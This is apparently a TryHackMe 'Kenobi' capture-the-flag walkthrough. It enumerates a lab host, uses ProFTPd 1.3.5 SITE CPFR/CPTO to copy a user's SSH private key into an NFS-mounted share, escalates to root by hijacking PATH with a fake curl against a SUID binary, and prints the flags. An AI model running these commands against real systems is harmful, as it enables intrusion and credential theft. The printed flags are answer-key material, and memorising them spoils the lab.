https://tryhackme.com/room/kenobi
Q1>
nmap -sT 10.10.103.23 -p-
Open Ports :
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
33813/tcp open unknown
37651/tcp open unknown
40133/tcp open unknown
54859/tcp open unknown
Answer is 7, as the last 4 ports are unknow service.
Enumerating for samba shares
Q1>
possible commands :
enum4linux
nmap -p 445 — script=smb-enum-shares.nse,smb-enum-users.nse 10.10.103.23
3 shares found :
Sharename Type Comment
— — — — — — — — — — -
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
Q2>
smbclient //10.10.103.23/Anonymous
apparently no root password required here
filename = log.txt
download via get command or use
smbget -R smb://<ip>/anonymous
Q3>
21
Q4>
Port 111(rpcbind) : Allow user on one pc to request services from other computer as long as they are connected to same network. As we are on the same network as the target, it is ready to serve us.
to enumerate :
nmap -p 111 — script=nfs-ls,nfs-statfs,nfs-showmount 10.10.103.23
Mount : /var
Gain initial access with ProFtpd
Q1>
connect to proftpd,
nc 10.10.103.23 21
version = 1.3.5
Q2>
searchsploit ProFTPd 1.3.5
number of exploilts : 4
link to exploit-db: ProFTPd 1.3.5 — File Copy — Linux remote Exploit (exploit-db.com)
Q3>
log.txt told us about the location of kenobi private keys.
SITE CPFR /home/kenobi/.ssh/id_rsa
copy it to var as we see, that is the library shared on the network.
SITE CPTO /var/temp_id-rsa
It was found with the nmap scan that, /var can be mounted.
Create a sub-directory in mount folder
mkdir /mnt/kenobiNFS
Mount the directoru
mount 10.10.102.233:/var /mnt/kenobiNFS
#mount machine_ip:/moountees_path /mounters_path
copy the file in your home directory.
Q4>
user.txt = d0b0f3f53b6caa532a83915e19224899
Privilage escalation Via path bariable manipulation
Q1>
find / -perm -u=s -type f 2>/dev/null
suspecious file: /usr/bin/menu
#this file is not generally located in the /usr/bin
Q2>
run the binary: /usr/bin/menu
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
answer : 3
Q4> run strings command
strings /usr/bin/menu
we see it uses the curl binary
so we make a malicious curl binary in /tmp directory
and store path to shell inside it. As it is running wit root privilages it will launch our root shell.
$ echo /bin/sh > curl
$ chmod 777 curl
$ export PATH=/tmp:$PATH
$ # we prepend tmp to path so that, when the binary runs it looks for $ the resources in tmp, and as it used curl it will launch root shell.
root flag = 177b3cd8562289f37382721c28381f02
